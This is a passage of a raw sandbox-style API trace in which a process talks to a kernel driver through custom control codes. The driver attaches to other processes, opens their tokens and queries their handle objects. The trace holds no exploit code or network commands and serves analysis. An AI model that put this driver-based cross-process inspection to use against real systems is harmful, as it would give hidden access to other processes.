AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0246.321] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.321] PsReleaseProcessExitSynchronization () returned 0x2 [0246.321] ObfDereferenceObject (Object=0xfffffa8002123060) returned 0x12 [0246.321] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa800315b044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800315b044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.321] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0246.321] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.321] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.321] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x984) returned 0xc8 [0246.321] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0246.321] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8002133b30, HandleInformation=0x0) returned 0x0 [0246.321] ObOpenObjectByPointer (in: Object=0xfffffa8002133b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0246.321] ObfDereferenceObject (Object=0xfffffa8002133b30) returned 0x14 [0246.321] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa80023ef980 | out: TokenHandle=0xfffffa80023ef980*=0xc4) returned 0x0 [0246.321] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0246.322] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.322] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0246.322] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0246.324] CloseHandle (hObject=0xc4) returned 1 [0246.324] CloseHandle (hObject=0xc8) returned 1 [0246.324] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.324] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0246.324] PsLookupProcessByProcessId (in: ProcessId=0x984, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.324] PsAcquireProcessExitSynchronization () returned 0x0 [0246.324] KeStackAttachProcess (in: PROCESS=0xfffffa8002133b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002133b30, ApcState=0xfffff880053c85d0) [0246.324] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800212b860, HandleInformation=0x0) returned 0x0 [0246.324] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.324] PsReleaseProcessExitSynchronization () returned 0x2 [0246.325] ObfDereferenceObject (Object=0xfffffa8002133b30) returned 0x12 [0246.325] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800310c044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800310c044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.325] ObfDereferenceObject (Object=0xfffffa800212b860) returned 0x1 [0246.325] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.325] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.325] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.325] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x7a, lpOverlapped=0x0) returned 1 [0246.325] PsLookupProcessByProcessId (in: ProcessId=0x984, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.325] PsAcquireProcessExitSynchronization () returned 0x0 [0246.325] KeStackAttachProcess (in: PROCESS=0xfffffa8002133b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002133b30, ApcState=0xfffff880053c85d0) [0246.325] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002131600, HandleInformation=0x0) returned 0x0 [0246.325] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.325] PsReleaseProcessExitSynchronization () returned 0x2 [0246.325] ObfDereferenceObject (Object=0xfffffa8002133b30) returned 0x12 [0246.325] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800312e044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800312e044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.325] ObfDereferenceObject (Object=0xfffffa8002131600) returned 0x1 [0246.325] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.325] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.325] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.325] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0246.325] PsLookupProcessByProcessId (in: ProcessId=0x984, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.325] PsAcquireProcessExitSynchronization () returned 0x0 [0246.325] KeStackAttachProcess (in: PROCESS=0xfffffa8002133b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002133b30, ApcState=0xfffff880053c85d0) [0246.325] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0246.325] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.326] PsReleaseProcessExitSynchronization () returned 0x2 [0246.326] ObfDereferenceObject (Object=0xfffffa8002133b30) returned 0x12 [0246.326] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003088044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003088044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.326] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0246.326] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.326] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.326] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.326] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x74, lpOverlapped=0x0) returned 1 [0246.326] PsLookupProcessByProcessId (in: ProcessId=0x984, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.326] PsAcquireProcessExitSynchronization () returned 0x0 [0246.326] KeStackAttachProcess (in: PROCESS=0xfffffa8002133b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002133b30, ApcState=0xfffff880053c85d0) [0246.326] ObReferenceObjectByHandle (in: Handle=0x7c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002138310, HandleInformation=0x0) returned 0x0 [0246.326] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.326] PsReleaseProcessExitSynchronization () returned 0x2 [0246.326] ObfDereferenceObject (Object=0xfffffa8002133b30) returned 0x12 [0246.326] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.326] ObfDereferenceObject (Object=0xfffffa8002138310) returned 0x1 [0246.326] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.326] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.326] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.326] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0246.326] PsLookupProcessByProcessId (in: ProcessId=0x984, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.326] PsAcquireProcessExitSynchronization () returned 0x0 [0246.326] KeStackAttachProcess (in: PROCESS=0xfffffa8002133b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002133b30, ApcState=0xfffff880053c85d0) [0246.326] ObReferenceObjectByHandle (in: Handle=0x80, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0019027a0, HandleInformation=0x0) returned 0x0 [0246.326] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.327] PsReleaseProcessExitSynchronization () returned 0x2 [0246.327] ObfDereferenceObject (Object=0xfffffa8002133b30) returned 0x12 [0246.327] ObQueryNameString (in: Object=0xfffff8a0019027a0, ObjectNameInfo=0xfffffa800310e044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800310e044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.327] ObfDereferenceObject (Object=0xfffff8a0019027a0) returned 0x1 [0246.327] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.327] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.327] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x994) returned 0xc8 [0246.327] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0246.327] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa80021395d0, HandleInformation=0x0) returned 0x0 [0246.327] ObOpenObjectByPointer (in: Object=0xfffffa80021395d0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0246.327] ObfDereferenceObject (Object=0xfffffa80021395d0) returned 0x14 [0246.327] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa80023ef980 | out: TokenHandle=0xfffffa80023ef980*=0xc4) returned 0x0 [0246.327] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0246.327] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.327] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0246.327] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0246.329] CloseHandle (hObject=0xc4) returned 1 [0246.329] CloseHandle (hObject=0xc8) returned 1 [0246.329] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.329] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0246.329] PsLookupProcessByProcessId (in: ProcessId=0x994, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.329] PsAcquireProcessExitSynchronization () returned 0x0 [0246.329] KeStackAttachProcess (in: PROCESS=0xfffffa80021395d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80021395d0, ApcState=0xfffff880053c85d0) [0246.329] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800213c390, HandleInformation=0x0) returned 0x0 [0246.329] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.329] PsReleaseProcessExitSynchronization () returned 0x2 [0246.329] ObfDereferenceObject (Object=0xfffffa80021395d0) returned 0x12 [0246.330] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.330] ObfDereferenceObject (Object=0xfffffa800213c390) returned 0x1 [0246.330] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.330] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.330] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.330] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x92, lpOverlapped=0x0) returned 1 [0246.330] PsLookupProcessByProcessId (in: ProcessId=0x994, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.330] PsAcquireProcessExitSynchronization () returned 0x0 [0246.330] KeStackAttachProcess (in: PROCESS=0xfffffa80021395d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80021395d0, ApcState=0xfffff880053c85d0) [0246.330] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800213db50, HandleInformation=0x0) returned 0x0 [0246.330] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.330] PsReleaseProcessExitSynchronization () returned 0x2 [0246.330] ObfDereferenceObject (Object=0xfffffa80021395d0) returned 0x12 [0246.330] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.330] ObfDereferenceObject (Object=0xfffffa800213db50) returned 0x1 [0246.330] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.330] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.330] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.330] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0246.330] PsLookupProcessByProcessId (in: ProcessId=0x994, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.330] PsAcquireProcessExitSynchronization () returned 0x0 [0246.330] KeStackAttachProcess (in: PROCESS=0xfffffa80021395d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80021395d0, ApcState=0xfffff880053c85d0) [0246.330] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0246.331] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.331] PsReleaseProcessExitSynchronization () returned 0x2 [0246.331] ObfDereferenceObject (Object=0xfffffa80021395d0) returned 0x12 [0246.331] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.331] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0246.331] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.331] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.331] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.331] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x74, lpOverlapped=0x0) returned 1 [0246.331] PsLookupProcessByProcessId (in: ProcessId=0x994, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.331] PsAcquireProcessExitSynchronization () returned 0x0 [0246.331] KeStackAttachProcess (in: PROCESS=0xfffffa80021395d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80021395d0, ApcState=0xfffff880053c85d0) [0246.331] ObReferenceObjectByHandle (in: Handle=0x7c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002131950, HandleInformation=0x0) returned 0x0 [0246.331] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.331] PsReleaseProcessExitSynchronization () returned 0x2 [0246.331] ObfDereferenceObject (Object=0xfffffa80021395d0) returned 0x12 [0246.331] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.331] ObfDereferenceObject (Object=0xfffffa8002131950) returned 0x1 [0246.331] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.331] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.331] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.331] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0246.331] PsLookupProcessByProcessId (in: ProcessId=0x994, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.331] PsAcquireProcessExitSynchronization () returned 0x0 [0246.331] KeStackAttachProcess (in: PROCESS=0xfffffa80021395d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80021395d0, ApcState=0xfffff880053c85d0) [0246.332] ObReferenceObjectByHandle (in: Handle=0x80, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0019075e0, HandleInformation=0x0) returned 0x0 [0246.332] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.332] PsReleaseProcessExitSynchronization () returned 0x2 [0246.332] ObfDereferenceObject (Object=0xfffffa80021395d0) returned 0x12 [0246.332] ObQueryNameString (in: Object=0xfffff8a0019075e0, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.332] ObfDereferenceObject (Object=0xfffff8a0019075e0) returned 0x1 [0246.332] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.332] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.332] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9a4) returned 0xc8 [0246.332] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0246.332] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8002148b30, HandleInformation=0x0) returned 0x0 [0246.332] ObOpenObjectByPointer (in: Object=0xfffffa8002148b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0246.332] ObfDereferenceObject (Object=0xfffffa8002148b30) returned 0x14 [0246.332] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa80023ef980 | out: TokenHandle=0xfffffa80023ef980*=0xc4) returned 0x0 [0246.332] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0246.332] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.332] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0246.332] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0246.431] CloseHandle (hObject=0xc4) returned 1 [0246.431] CloseHandle (hObject=0xc8) returned 1 [0246.431] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.431] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0246.431] PsLookupProcessByProcessId (in: ProcessId=0x9a4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.431] PsAcquireProcessExitSynchronization () returned 0x0 [0246.431] KeStackAttachProcess (in: PROCESS=0xfffffa8002148b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002148b30, ApcState=0xfffff880053c85d0) [0246.431] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800213c240, HandleInformation=0x0) returned 0x0 [0246.431] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.431] PsReleaseProcessExitSynchronization () returned 0x2 [0246.431] ObfDereferenceObject (Object=0xfffffa8002148b30) returned 0x12 [0246.432] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.432] ObfDereferenceObject (Object=0xfffffa800213c240) returned 0x1 [0246.432] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.432] HeapFree (in: 